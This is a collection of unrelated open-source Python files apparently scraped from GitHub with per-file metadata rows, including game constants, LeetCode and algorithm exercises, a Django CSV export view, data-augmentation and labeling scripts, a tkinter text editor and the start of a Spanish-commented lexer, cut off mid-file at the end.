UFO_LEFT_PAD = 0
UFO_TOP_PAD = 16
UFO_WIDTH = 64
UFO_HEIGHT = 32
# Scales for the constants as the level progresses
ALIEN_LEVEL_BEATEN_MOVES_PER_SECOND_SCALE = 1.15
ALIEN_DROP_ROW_MOVES_PER_SECOND_SCALE = 1.25
ALIEN_CHANCE_TO_FIRE_SCALE = 1.065
UFO_SPEED_SCALE = 1.05
# Hud constants
FONT_SIZE = int(ICON_SIZE[0] / 1.7)
SCORE_TEXT_COORDINATES = (SCREEN_SIZE[0] / 5 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
SCORE_VALUE_COORDINATES = (
SCORE_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
LEVEL_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
LEVEL_VALUE_COORDINATES = (
LEVEL_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
NUM_LIVES_TEXT_COORDINATES = (SCREEN_SIZE[0] / 5 * 4 - FONT_SIZE * 5 / 2,
SCREEN_SIZE[1] / 100)
NUM_LIVES_VALUE_COORDINATES = (
NUM_LIVES_TEXT_COORDINATES[0], FONT_SIZE + SCREEN_SIZE[1] / 50)
NUM_POINTS_FOR_ALIEN_KILL = 10
# Game over screen constants
GAME_OVER_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * (9 / 2),
SCREEN_SIZE[1] / 2 - FONT_SIZE / 2 - FONT_SIZE * 3)
GAME_OVER_SCORE_TEXT_Y_COORDINATE = GAME_OVER_TEXT_COORDINATES[1] + FONT_SIZE * 2
HIGH_SCORE_TEXT_Y_COORDINATE = GAME_OVER_SCORE_TEXT_Y_COORDINATE + FONT_SIZE * 2
RESTART_TEXT_COORDINATES = (SCREEN_SIZE[0] / 2 - FONT_SIZE * (12 / 2),
HIGH_SCORE_TEXT_Y_COORDINATE + FONT_SIZE * 2)
# Other
NUM_LEVELS_TILL_NEW_ALIEN_ROW = 3
BASE_POINTS_PER_KILL = 10
BASE_POINTS_PER_UFO_KILL = 100
FPS = 30 # Used to maintain smooth movement
| SimonValentino/SpaceInvaders | constants.py | constants.py | py | 3,409 | python | en | code | 0 | github-code | 36 |
70536840424 | '''
You are given a string allowed consisting of distinct characters and an array of strings words. A string is consistent if all characters in the string appear in the string allowed.
Return the number of consistent strings in the array words.
'''
class Solution(object):
def countConsistentStrings(self, allowed, words):
"""
:type allowed: str
:type words: List[str]
:rtype: int
"""
s = set(allowed)
output = 0
for word in words:
output += 1 if all([char in s for char in word]) else 0
return output | ChrisStewart132/LeetCode | 1684. Count the Number of Consistent Strings.py | 1684. Count the Number of Consistent Strings.py | py | 591 | python | en | code | 0 | github-code | 36 |
21213459172 | import csv
from django.db.models import Q
from django.http import HttpResponse
from data.models import (
List,
Pairing,
AOS,
BCP,
)
def raw_list(request, list_id):
list = List.objects.get(id=list_id)
return HttpResponse(list.raw_list.replace("\n", "<br>"))
def export_pairings_as_csv(request, game_type: int = AOS):
pairings = Pairing.objects.filter(
Q(event__start_date__range=["2023-07-01", "2023-12-31"])
& Q(event__rounds__in=[3, 5, 8])
& Q(event__game_type=game_type)
& Q(event__source=BCP)
).order_by("event__name", "-event__start_date", "round", "id")
response = HttpResponse(content_type="text/csv")
response["Content-Disposition"] = 'attachment; filename="pairings.csv"'
writer = csv.writer(
response,
quoting=csv.QUOTE_NONNUMERIC,
)
writer.writerow(
[
"pairing_id",
"round",
"player1_name",
"player2_name",
"player1_result",
"player2_result",
"player1_score",
"player2_score",
"event_name",
"event_date",
"event_end_date",
"event_country",
"event_online",
"season",
"player1_faction",
"player1_subfaction",
"player2_faction",
"player2_subfaction",
"player1_list_url",
"player2_list_url",
"source",
]
)
for pairing in pairings:
if pairing.event.source == BCP:
player1_name = (
f"{pairing.player1.player.source_json['firstName']} {pairing.player1.player.source_json['lastName']}"
if pairing.player1
else ""
)
player2_name = (
f"{pairing.player2.player.source_json['firstName']} {pairing.player2.player.source_json['lastName']}"
if pairing.player2
else ""
)
else:
player1_name = (
pairing.player1.player.source_json["playerName"]
if pairing.player1
else ""
)
player2_name = (
pairing.player2.player.source_json["playerName"]
if pairing.player2
else ""
)
event_country = (
pairing.event.source_json["country"] if pairing.event.source_json else ""
)
if "isOnlineEvent" in pairing.event.source_json:
event_online = pairing.event.source_json["isOnlineEvent"]
else:
event_online = False
player1_list_faction = (
pairing.player1_list.faction if pairing.player1_list else ""
)
player1_list_subfaction = (
pairing.player1_list.subfaction if pairing.player1_list else ""
)
player2_list_faction = (
pairing.player2_list.faction if pairing.player2_list else ""
)
player2_list_subfaction = (
pairing.player2_list.subfaction if pairing.player2_list else ""
)
if pairing.player1_list and len(pairing.player1_list.raw_list) > 10000:
pairing.player1_list.raw_list = "List too long"
if pairing.player2_list and len(pairing.player2_list.raw_list) > 10000:
pairing.player2_list.raw_list = "List too long"
writer.writerow(
[
pairing.id,
pairing.round,
player1_name,
player2_name,
pairing.player1_result,
pairing.player2_result,
pairing.player1_score,
pairing.player2_score,
pairing.event.name,
pairing.event.start_date,
pairing.event.end_date,
event_country,
event_online,
"2023",
player1_list_faction,
player1_list_subfaction,
player2_list_faction,
player2_list_subfaction,
pairing.player1_list.raw_list if pairing.player1_list else "",
pairing.player2_list.raw_list if pairing.player2_list else "",
"bcp" if pairing.event.source == BCP else "snl",
]
)
return response
| Puciek/aos_tools | data/views.py | views.py | py | 4,349 | python | en | code | 0 | github-code | 36 |
6084393611 | # Check Permutation: Given two strings, write a method
# to decide if one is a permutation of the other
# we can sort both strings then compare if they are equal
# merge sort
def merge_sort(arr):
if len(arr) > 1:
# Finding the mid of the array
mid = len(arr) // 2
# Dividing the array elements
L = arr[:mid]
# into 2 halves
R = arr[mid:]
# Sorting the first half
merge_sort(L)
# Sorting the second half
merge_sort(R)
i = j = k = 0
# Copy data to temp arrays L[] and R[]
while i < len(L) and j < len(R):
if L[i] < R[j]:
arr[k] = L[i]
i += 1
else:
arr[k] = R[j]
j += 1
k += 1
# Checking if any element was left
while i < len(L):
arr[k] = L[i]
i += 1
k += 1
while j < len(R):
arr[k] = R[j]
j += 1
k += 1
def string_permutation(str1, str2):
arr1 = list(str1)
arr2 = list(str2)
merge_sort(arr1)
merge_sort(arr2)
str1 = "".join(arr1)
str2 = "".join(arr2)
return str1 == str2
# -------------------- better approach ------------------
# -------------------- hash table -------------------
def string_permutation_optimized(str1, str2):
# base case
if len(str1) != len(str2):
return False
# hash map
hash_map = {}
for c in str1:
if c in hash_map:
hash_map[c] += 1
else:
hash_map[c] = 1
for c in str2:
# check if c is in hash_map
if c in hash_map:
hash_map[c] -= 1
if hash_map[c] < 0:
return False
return True
print(string_permutation_optimized('aaca', 'aacc'))
| phuclinh9802/data_structures_algorithms | chapter 1/1_2.py | 1_2.py | py | 1,834 | python | en | code | 0 | github-code | 36 |
70874370025 | import logging
from datetime import datetime
from typing import Generic, Text, Type, TypeVar
from uuid import UUID, uuid4
from injector import (
Injector,
UnknownProvider,
UnsatisfiedRequirement,
inject,
singleton,
)
from pydantic import BaseModel, Field
log = logging.getLogger(__name__)
class Command(BaseModel):
id: UUID = Field(default_factory=uuid4)
timestamp: datetime = Field(default_factory=datetime.utcnow)
class Config:
allow_mutation = False
def __str__(self) -> Text:
std_str = super().__str__()
return f"<Command:{self.__class__.__name__} {std_str}>"
class Event(BaseModel):
command_id: UUID
id: UUID = Field(default_factory=uuid4)
timestamp: datetime = Field(default_factory=datetime.utcnow)
class Config:
allow_mutation = False
def __str__(self) -> Text:
std_str = super().__str__()
return f"<Event:{self.__class__.__name__} {std_str}>"
TCommand = TypeVar("TCommand")
class Handler(Generic[TCommand]):
def __call__(self, command: TCommand) -> None:
raise NotImplementedError
@inject
@singleton
class CommandBus:
def __init__(self, container: Injector) -> None:
self._get = container.get
def handle(self, command: Command) -> None:
log.debug(command)
command_cls: Type[Command] = type(command)
handler = self._get(Handler[command_cls])
handler(command)
TEvent = TypeVar("TEvent")
class Listener(Generic[TEvent]):
def __call__(self, event: TEvent) -> None:
raise NotImplementedError
@inject
@singleton
class EventBus:
def __init__(self, container: Injector) -> None:
self._get = container.get
def emit(self, event: TEvent) -> None:
log.debug(event)
event_cls: Type[TEvent] = type(event)
try:
listeners = self._get(list[Listener[event_cls]])
except (UnsatisfiedRequirement, UnknownProvider):
listeners = []
for listener in listeners:
listener(event)
__all__ = ["Command", "CommandBus", "Event", "EventBus", "Handler", "Listener"]
| lzukowski/workflow | src/application/bus.py | bus.py | py | 2,137 | python | en | code | 5 | github-code | 36 |
20407333579 | def kmp(pattern, text):
lps = [0] * len(pattern)
i, j = 0, 0
count = 0
lps = lpsarr(pattern, lps)
print(lps)
while i < len(text):
if text[i] == pattern[j]:
i += 1
j += 1
else:
if j!= 0 :
j = lps[j-1]
else:
i += 1
if j == len(pattern):
count += 1
print(f"Starting Index {i-j}")
j = lps[j-1]
if count != 0 :
return f"Total Matches Found {count}"
else:
return "No Match Found"
def lpsarr(pattern, lps):
i = 0
j = 1
lps[0] = 0
while j < len(pattern):
if pattern[i] == pattern[j]:
lps[j] = i + 1
j += 1
i += 1
else:
if i != 0:
i = lps[i-1]
else:
lps[i] = 0
j += 1
return lps
A = "onionionspl"
B = "onions"
print(kmp(B,A)) | Bishtman12/DSA---Python | String/KMP ALGO.py | KMP ALGO.py | py | 950 | python | en | code | 0 | github-code | 36 |
39395995067 | from aiogram.types import (
ReplyKeyboardMarkup,
InlineKeyboardMarkup,
InlineKeyboardButton,
)
main_buttons = {
"ask": "Спросить 🤖",
}
class Keyboard:
def __init__(self):
self.main = self.make_main_buttons()
def make_main_buttons(self):
_keyboard_main = ReplyKeyboardMarkup(resize_keyboard=True)
for button_label in main_buttons.values():
_keyboard_main.add(button_label)
return _keyboard_main
@property
def translate(self):
inline_keyboard = InlineKeyboardMarkup(row_width=2)
true_button = InlineKeyboardButton(text="Да", callback_data=f"translate_1")
false_button = InlineKeyboardButton(text="Нет", callback_data=f"translate_0")
inline_keyboard.row(true_button, false_button)
return inline_keyboard
kb = Keyboard()
| Devil666face/ChatGPTosBot | bot/keyboard.py | keyboard.py | py | 856 | python | en | code | 0 | github-code | 36 |
23012638929 | """
Script for labeling purposes
Usage :
python label_processing.py -d [PATH TO IMAGES FOLDER] [PARAMS]
Parameters:
-d : Path to the folder where the images is stored
-l : Lower all labels in xml files.
-c : Count each label of all the xml files
-s : Find images with specific label
-lm : Create label_map.pbtxt
-ar : Remove xml piles without images
RangRang - Machine Learning - 2021
"""
import os, argparse, glob
import xml.etree.ElementTree as ET
def auto_remove(path):
""" Menghapus file xml tanpa gambar """
images = [os.path.splitext(x) for x in os.listdir(path)]
images = [x for x, y in images]
for x in set(images):
if images.count(x) < 2:
os.remove(os.path.join(path, x + '.xml'))
def make_labelmap(path, export_dir):
""" Membuat label_map.pbtxt """
labels = []
for xml_file in glob.glob(path + '/*.xml'):
root = ET.parse(xml_file).getroot()
for member in root.findall('object'):
if member[0].text not in labels:
labels.append(member[0].text)
with open(os.path.join(export_dir, 'label_map.pbtxt'), 'w') as w:
for i, label in enumerate(labels):
w.writelines('item {\n id: ' + str(i + 1) + "\n name: '" + label + "'\n}\n\n")
print(f'[INFO] label_map.pbtxt exported to {export_dir}')
def counter(path):
""" Menghitung jumlah masing - masing label dari setiap xml file """
count = {}
for xml_file in glob.glob(path + '/*.xml'):
root = ET.parse(xml_file).getroot()
for member in root.findall('object'):
if member[0].text in count:
count[member[0].text] += 1
else:
count[member[0].text] = 1
print('[INFO] Label Counter')
for i, (key, value) in enumerate(count.items()):
print(f' {i + 1}. {key} : {value}')
def search(path, indexs):
""" Mencari image yang memiliki label tertentu """
images = {}
for xml_file in glob.glob(path + '/*.xml'):
images[os.path.basename(xml_file)] = []
root = ET.parse(xml_file).getroot()
for member in root.findall('object'):
images[os.path.basename(xml_file)].append(member[0].text)
print('[INFO] Label Finder')
for label in indexs.split(','):
print(f' {label} '.center(20, '#'))
for img in [x for x, y in images.items() if label in y]:
print(f' - {img}')
print()
def lower(path):
""" lowering all label in the xml files """
for xml_file in glob.glob(path + '/*.xml'):
root = ET.parse(xml_file).getroot()
for member in root.findall('object'):
member[0].text = member[0].text.lower()
element = ET.tostring(root)
with open(xml_file, "wb") as w:
w.write(element)
def UA(path):
""" lowering all label in the xml files """
for xml_file in glob.glob(path + '/*.xml'):
root = ET.parse(xml_file).getroot()
img_file = list(os.path.splitext(os.path.basename(root.find('filename').text)))
xml_file_ = list(os.path.splitext(os.path.basename(xml_file)))
if img_file[0] != xml_file_[0]:
img_file[0] = xml_file_[0]
if os.path.isfile(os.path.join(path, img_file[0] + '.jpg')):
img_file[1] = '.jpg'
else:
img_file[1] = '.jpeg'
img_file = img_file[0] + img_file[1]
root.find('filename').text = img_file
print(f'[INFO] Writing {xml_file}')
element = ET.tostring(root)
with open(xml_file, "wb") as w:
w.write(element)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Labeling helper script")
parser.add_argument("-d",
"--img_dir",
help="Path to the folder where the images is stored.",
type=str)
parser.add_argument("-l",
"--to_lower",
help="Lower all labels in xml files.",
action='store_true')
parser.add_argument("-c",
"--counter",
help="Count each label of all the xml files",
action='store_true')
parser.add_argument("-s",
"--search",
help="Find images with specific label",
type=str)
parser.add_argument("-lm",
"--label_map",
help="Create label_map.pbtxt",
type=str)
parser.add_argument("-ar",
"--auto_remove",
help="Delete xlm files without img",
action='store_true')
parser.add_argument("-ua",
"--update_annotation",
help="Update annotation",
action='store_true')
args = parser.parse_args()
if args.img_dir is None:
raise KeyError('Harus menyertakan -d argument atau folder dimana images disimpan')
if args.to_lower:
lower(args.img_dir)
if args.counter:
counter(args.img_dir)
if args.search:
search(args.img_dir, args.search)
if args.label_map:
make_labelmap(args.img_dir, args.label_map)
if args.auto_remove:
auto_remove(args.img_dir)
if args.update_annotation:
UA(args.img_dir) | Hyuto/rangrang-ML | scripts/label_processing.py | label_processing.py | py | 5,474 | python | en | code | 0 | github-code | 36 |
74286571624 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# PYTHON_ARGCOMPLETE_OK
# Pass --help flag for help on command-line interface
import sympy as sp
import numpy as np
from pyneqsys.symbolic import SymbolicSys
def solve(guess_a, guess_b, power, solver='scipy'):
""" Constructs a pyneqsys.symbolic.SymbolicSys instance and returns from its ``solve`` method. """
# The problem is 2 dimensional so we need 2 symbols
x = sp.symbols('x:2', real=True)
# There is a user specified parameter ``p`` in this problem:
p = sp.Symbol('p', real=True, negative=False, integer=True)
# Our system consists of 2-non-linear equations:
f = [x[0] + (x[0] - x[1])**p/2 - 1,
(x[1] - x[0])**p/2 + x[1]]
# We construct our ``SymbolicSys`` instance by passing variables, equations and parameters:
neqsys = SymbolicSys(x, f, [p]) # (this will derive the Jacobian symbolically)
# Finally we solve the system using user-specified ``solver`` choice:
return neqsys.solve([guess_a, guess_b], [power], solver=solver)
def main(guess_a=1., guess_b=0., power=3, savetxt='None', verbose=False):
"""
Example demonstrating how to solve a system of non-linear equations defined as SymPy expressions.
The example shows how a non-linear problem can be given a command-line interface which may be
preferred by end-users who are not familiar with Python.
"""
x, sol = solve(guess_a, guess_b, power) # see function definition above
assert sol.success
if savetxt != 'None':
np.savetxt(x, savetxt)
else:
if verbose:
print(sol)
else:
print(x)
if __name__ == '__main__': # are we running from the command line (or are we being imported from)?
try:
import argh
argh.dispatch_command(main, output_file=None)
except ImportError:
import sys
if len(sys.argv) > 1:
import warnings
warnings.warn("Ignoring parameters run "
"'pip install --user argh' to fix.")
main()
| bjodah/pyneqsys | examples/bi_dimensional.py | bi_dimensional.py | py | 2,055 | python | en | code | 38 | github-code | 36 |
10746701513 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2020/10/15 10:19 PM
# @Author: Zechen Li
# @File : aug.py.py
from glue.tasks import get_task
import pandas as pd
import numpy as np
import os
from augment.eda import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--alpha', default=0.1, type=float)
parser.add_argument('--num_aug', default=1, type=int)
parser.add_argument('--num_type', default=4, type=int)
parser.add_argument('--task_name', default='CoLA')
parser.add_argument('--dataroot', default='./glue_data/')
parser.add_argument('--aug_dataroot', default='./aug_data/')
args = parser.parse_args()
alpha = args.alpha
num_aug = args.num_aug
num_type = args.num_type
task_name = args.task_name
task_dir = os.path.join(args.dataroot, task_name)
task = get_task(task_name.lower(), task_dir)
output_dir = os.path.join(args.aug_dataroot, task_name)
try:
os.makedirs(output_dir)
except OSError:
pass
ori_train_df = task.get_train_df()
ori_dev_df = task.get_dev_df()
aug_train_df = pd.DataFrame(columns=["sentence", "label"])
print("Trainning dataset preview:")
print("train sentences num:", len(ori_train_df))
print("Original:", ori_train_df.head())
for i in ori_train_df.sentence:
ori_train_sentence = i
method_label = np.random.randint(0, num_type, 1)[0]
method = augment_single_with_label(method_label)
aug_train_sentences = eda(ori_train_sentence, alpha=alpha, num_aug=num_aug, method=method)
for aug_sentence in aug_train_sentences:
aug_train_df = aug_train_df.append({'sentence': aug_sentence, 'label': method}, ignore_index=True)
print("Augment:", aug_train_df.head())
print(aug_train_df['label'].value_counts(normalize=True) * 100)
aug_train_df.to_csv(os.path.join(output_dir, "train.tsv"), sep='\t', index=False)
print('---------------------------------------------------------')
aug_dev_df = pd.DataFrame(columns=["sentence", "label"])
print("Dev dataset preview:")
print("dev sentences num:", len(ori_dev_df))
print("Original:", ori_dev_df.head())
for i in ori_dev_df.sentence:
ori_dev_sentence = i
method_label = np.random.randint(0, num_type, 1)[0]
method = augment_single_with_label(method_label)
aug_dev_sentences = eda(ori_dev_sentence, alpha=alpha, num_aug=num_aug, method=method)
for aug_sentence in aug_dev_sentences:
aug_dev_df = aug_dev_df.append({'sentence': aug_sentence, 'label': method}, ignore_index=True)
print("Augment:", aug_dev_df.head())
print(aug_dev_df['label'].value_counts(normalize=True) * 100)
aug_dev_df.to_csv(os.path.join(output_dir, "dev.tsv"), sep='\t', index=False)
print("generated augmented sentences finished.")
| UCSD-AI4H/SSReg | SSL-Reg-SATP/aug.py | aug.py | py | 2,685 | python | en | code | 8 | github-code | 36 |
14858436454 |
def get_input_lines():
return [line.strip() for line in open(0).readlines()]
def get_req():
# 12 red cubes, 13 green cubes, and 14 blue cubes
return {
'red':12,
'green':13,
'blue':14,
}
def main():
input_lines = get_input_lines()
req = get_req()
total = 0
for line in input_lines:
label, info = line.split(':')
id = int(label.split()[-1])
line_valid = True
for rev_cycle in info.split(';'):
for ball_info in rev_cycle.split(','):
count, color = ball_info.split()
if int(count) > req[color]:
line_valid = False
break
if not line_valid:
continue
total += id
print(total)
if __name__=='__main__':
main() | balker0322/advent_of_code | 2023_day_02/part1.py | part1.py | py | 812 | python | en | code | 0 | github-code | 36 |
74646034024 |
from tkinter import *
from tkinter import messagebox
from tkColorPicker import *
from tkinter import filedialog
from tkinter.filedialog import askopenfilename
from tkinter import filedialog
from tkinter import scrolledtext
import fileinput
import os
class menuBar(object):
def __init__(self):
self.bgcolor = None
# 打开的文件路径;打开的文件路径
self.file = None
self.f = None
# 创建主窗口
self.root = Tk()
self.root.title('菜单栏')
self.root.geometry('500x500')
# self.fram = Tk.frame(self.root)
# self.fram.pack()
self.create_menu()
self.root.mainloop()
#创建菜单栏
def create_menu(self):
# 创建菜单栏
self.menuBar = Menu(self.root)
self.root.config(menu=self.menuBar)
# 创建第一级菜单项fill
self.fillBar = Menu(self.menuBar, tearoff=0)
self.menuBar.add_cascade(label='第一个菜单栏', menu=self.fillBar)
self.twoBar = Menu(self.menuBar, tearoff=0)
self.menuBar.add_cascade(label='Open', menu=self.twoBar)
# 创建fill下面的二级菜单项
self.fillBar.add_command(label='new', command=self.winOne)
self.fillBar.add_separator()
self.fillBar.add_command(label='Exit', command=self.ExitClick)
self.twoBar.add_command(label='OpenColor', command=self.Open_Color)
self.twoBar.add_separator()
# accelerator 在子菜单后面追加文字
self.twoBar.add_command(label='打开', command=self.Open_File, accelerator='Ctr + O')
self.twoBar.bind_all("<Control-o>", self.Open_File)
self.twoBar.add_separator()
self.twoBar.add_command(label='保存', command=self.Save_File)
self.twoBar.add_command(label='另存为',command=self.Saves_File)
# 创建文本域
self.textnew = scrolledtext.ScrolledText(self.root, fg=self.bgcolor, width=100, height=100, wrap=tk.WORD)
# textnew.grid()
self.textnew.pack()
# 关闭事件
def ExitClick(self):
# 关闭窗口
self.root.quit()
# 将所有控件销毁,内存回收
self.root.destroy()
exit()
# 创建子窗口
def winOne(self):
top1 = Toplevel()
top1.title('子窗口')
top1.geometry('400x300')
but1 = Button(top1, text='子窗体按钮', command=self.help_test)
but1.pack()
# 取消窗口的最大化最小化按钮
# top1.attributes('-toolwindow', 1)
top1.focus_get()
# 窗口顶置
top1.wm_attributes('-topmost', 1)
def help_test(self):
'''
askokcancel 确定、取消对话框,按钮返回值 True/False
askquestion 是、否对话框,按钮返回值 yes/no
askyesno 是、否对话框,按钮返回值 True/False
showerror 错误对话框,按钮返回值 ok
showinfo 按钮返回值 ok
showwarning 警告对话框 按钮返回值 ok
:return:
'''
ask = messagebox.askokcancel('点击','按钮被点击了',)
if ask:
print('确定',ask)
else:
print('取消')
# 打开颜色控制面板
def Open_Color(self):
# color = askcolor('red',0,'颜色面板')
# if color[1] != None:
# print('选中的颜色是:',color)
# self.bgcolor = color[1]
# else:
# print('没有选择颜色!',color)
color = askcolor()
self.textnew["foreground"] = color[1]
def Open_File(self,event=None):
self.file = askopenfilename(filetypes=[('txt','*.txt')])
# 给文本框赋值
for line in fileinput.input(self.file):
self.textnew.insert("1.0",line)
def Save_File(self):
# 获取文本域中的数据
test = self.textnew.get(1.0,END)
# print(test)
# 判断文件是否是文件
# if os.path.isfile(self.file):
if self.file!=None:
self.f = open(self.file, 'w')
# 将文本域中修改后的值保存
self.f.write(str(test))
self.f.close()
else:
# 另存为打开文件夹
name = filedialog.asksaveasfilename(title='保存文件', filetypes=[('保存文件','*.txt')],defaultextension='.txt')
print('aa', name)
if name:
fop = open(name, 'w')
fop.write(str(test))
# fop.fileno()
fop.close()
def Saves_File(self):
# 获取文本域中的数据
test = self.textnew.get(1.0, END)
# 另存为打开文件夹
name = filedialog.asksaveasfilename(title='保存文件', filetypes=[('保存文件', '*.txt')], defaultextension='.txt')
print('aa', name)
if name:
fop = open(name, 'w')
fop.write(str(test))
# fop.fileno()
fop.close()
def delete(self):
self.textnew.insert(tk.INSERT, '')
self.textnew.update()
menu_bar = menuBar()
| iospeng/python | pycharm_demo/demo/python/demo1/menuBar_text.py | menuBar_text.py | py | 5,132 | python | zh | code | 0 | github-code | 36 |
4767724527 | import os
#os.environ['GLOG_minloglevel'] = '2'
from tqdm import trange
import caffe
import argparse
import pandas as pd
def main(solver_proto, out_dir):
caffe.set_mode_gpu()
solver = caffe.SGDSolver(solver_proto)
train_loss, test_loss = [], []
test_loss.append(solver.test_nets[0].blobs['loss'].data.copy())
for ix in trange(solver.param.max_iter, desc='overall progress'): #):
for jx in trange(solver.param.test_interval, desc='until next test'):
solver.step(1)
train_loss.append(solver.net.blobs['loss'].data.ravel()[0])
test_loss.append(solver.test_nets[0].blobs['loss'].data.ravel()[0])
if ix % 1 == 0:
solver.snapshot()
pd.DataFrame(train_loss, columns=['train_loss']).to_csv(os.path.join(out_dir, 'train_loss.csv'))
pd.DataFrame(test_loss, columns=['test_loss']).to_csv(os.path.join(out_dir, 'test_loss.csv'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--solver', required=True, type=str)
parser.add_argument('--out_dir', default='.')
args = parser.parse_args()
main(args.solver, args.out_dir)
| alexkreimer/monocular-odometry | tools/solve.py | solve.py | py | 1,237 | python | en | code | 1 | github-code | 36 |
14145244822 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 12 22:29:57 2020
@author: b
https://www.kaggle.com/kanncaa1/data-sciencetutorial-for-beginners#1.-INTRODUCTION-TO-PYTHON
3.CLEANING DATA
DIAGNOSE DATA for CLEANING
We need to diagnose and clean data before exploring.
Unclean data:
Column name inconsistency like upper-lower case letter or space between words
missing data
different language
We will use head, tail, columns, shape and info methods to diagnose data
"""
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import matplotlib.pyplot as plt
import seaborn as sns # visualization tool
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
import os
os.chdir ('/home/b/Documents/Python/Data/Pokemon Challenge')
data = pd.read_csv('pokemon.csv')
# tail shows last 5 rows
data.tail()
# columns gives column names of features
data.columns
# shape gives number of rows and columns in a tuble
data.shape
# info gives data type like dataframe, number of sample or row, number of feature or column, feature types and memory usage
data.info()
"""
EXPLORATORY DATA ANALYSIS
value_counts(): Frequency counts
outliers: the value that is considerably higher or lower from rest of the data
Lets say value at 75% is Q3 and value at 25% is Q1.
Outlier are smaller than Q1 - 1.5(Q3-Q1) and bigger than Q3 + 1.5(Q3-Q1). (Q3-Q1) = IQR
We will use describe() method. Describe method includes:
count: number of entries
mean: average of entries
std: standart deviation
min: minimum entry
25%: first quantile
50%: median or second quantile
75%: third quantile
max: maximum entry
"""
# For example lets look frequency of pokemom types
print(data['Type 1'].value_counts(dropna =False)) # if there are nan values that also be counted
# As it can be seen below there are 112 water pokemon or 70 grass pokemon
# For example max HP is 255 or min defense is 5
data.describe() #ignore null entries
"""
VISUAL EXPLORATORY DATA ANALYSIS
Box plots: visualize basic statistics like outliers, min/max or quantiles
"""
# For example: compare attack of pokemons that are legendary or not
# Black line at top is max
# Blue line at top is 75%
# Red line is median (50%)
# Blue line at bottom is 25%
# Black line at bottom is min
# There are no outliers
data.boxplot(column='Attack',by = 'Legendary')
"""
TIDY DATA
We tidy data with melt(). Describing melt is confusing. Therefore lets make example to understand it.
"""
# Firstly I create new data from pokemons data to explain melt nore easily.
data_new = data.head() # I only take 5 rows into new data
data_new
# lets melt
# id_vars = what we do not wish to melt
# value_vars = what we want to melt
melted = pd.melt(frame=data_new,id_vars = 'Name', value_vars= ['Attack','Defense'])
melted
"""
PIVOTING DATA
Reverse of melting.
"""
# Index is name
# I want to make that columns are variable
# Finally values in columns are value
melted.pivot(index = 'Name', columns = 'variable',values='value')
"""
DATA TYPES
There are 5 basic data types: object(string),booleab, integer, float and categorical.
We can make conversion data types like from str to categorical or from int to float
Why is category important:
make dataframe smaller in memory
can be utilized for anlaysis especially for sklear(we will learn later)
"""
data.dtypes
# lets convert object(str) to categorical and int to float.
data['Type 1'] = data['Type 1'].astype('category')
data['Speed'] = data['Speed'].astype('float')
# As you can see Type 1 is converted from object to categorical
# And Speed ,s converted from int to float
data.dtypes
"""
MISSING DATA and TESTING WITH ASSERT
If we encounter with missing data, what we can do:
leave as is
drop them with dropna()
fill missing value with fillna()
fill missing values with test statistics like mean
Assert statement: check that you can turn on or turn off when you are done with your testing of the program
"""
# Lets look at does pokemon data have nan value
# As you can see there are 800 entries. However Type 2 has 414 non-null object so it has 386 null object.
data.info()
# Lets chech Type 2
data["Type 2"].value_counts(dropna =False)
# As you can see, there are 386 NAN value
# Lets drop nan values
data1=data # also we will use data to fill missing value so I assign it to data1 variable
data1["Type 2"].dropna(inplace = True) # inplace = True means we do not assign it to new variable. Changes automatically assigned to data
# So does it work ?
# Lets check with assert statement
# Assert statement:
assert 1==1 # return nothing because it is true
# In order to run all code, we need to make this line comment
# assert 1==2 # return error because it is false
assert data['Type 2'].notnull().all() # returns nothing because we drop nan values
data["Type 2"].fillna('empty',inplace = True)
assert data['Type 2'].notnull().all() # returns nothing because we do not have nan values
# # With assert statement we can check a lot of thing. For example
# assert data.columns[1] == 'Name'
# assert data.Speed.dtypes == np.int
| b846/Data | 3a Python Melt Assert.py | 3a Python Melt Assert.py | py | 5,454 | python | en | code | 0 | github-code | 36 |
5547122437 | #!/local/cluster/bin/python
#biopython take three regions, invert middle, then put together
import sys
from Bio import SeqIO
strain=sys.argv[1]
#include 50 bp margin so as not to interrupt att site in rotated genome
largestart=int(sys.argv[2]) + 50
largeend=int(sys.argv[3]) - 50
infile="../" + strain + ".gbk"
outfile=strain + ".noSI.gbk"
record = SeqIO.read(infile, "genbank")
firstpart = record[1:largestart]
endpart = record[largeend:len(record.seq)]
newrecord = firstpart + endpart
fw=open(outfile,'w')
SeqIO.write(newrecord,fw,"genbank")
| osuchanglab/BradyrhizobiumGenomeArchitecture | remove_monopartite.py | remove_monopartite.py | py | 547 | python | en | code | 0 | github-code | 36 |
21723031249 | from simbolo import Simbolo, TOKENS, ZONA_DE_CODIGO, TIPO_DATO
from error import Error
import json
palabras_reservadas = [
'bool',
'call',
'char',
'do',
'else',
'float',
'for',
'function',
'if',
'int',
'main',
'read',
'return',
'string',
'then',
'to',
'void',
'while',
'write',
'false',
'true']
#? Lista de Palabras reservadas
class Lexico:
def __init__(self, codigo): #Constructor del Analizador Lexico.
self.codigo = " " + codigo + " " #codigo fuente a compilar.
self.tablaSimb = [] #tabla de Simbolos
self.index = 0 #indice del caracter actual
self.inicioLex = 1 #inicio del lexema actual
self.Lexema = "" #Ultimo lexema encontrado
self.num_linea = 1 #numero de linea del codigo fuente
self.estado = 0
self.caracteres_permitidos = "(){}[],;+-*/\\%&|!" #estado actual en los automatas.
self.tipo_de_dato_actual = 0 # Registra el tipo de dato de los identificadores.
self.zona_de_codigo = ZONA_DE_CODIGO['DEF_VARIABLES_GLOBALES'] # Indica la zona del codigo
# fuente que se esa procesando.
self.fin_definicion_palabras_reservadas = None # Indica donde termina la definicion de
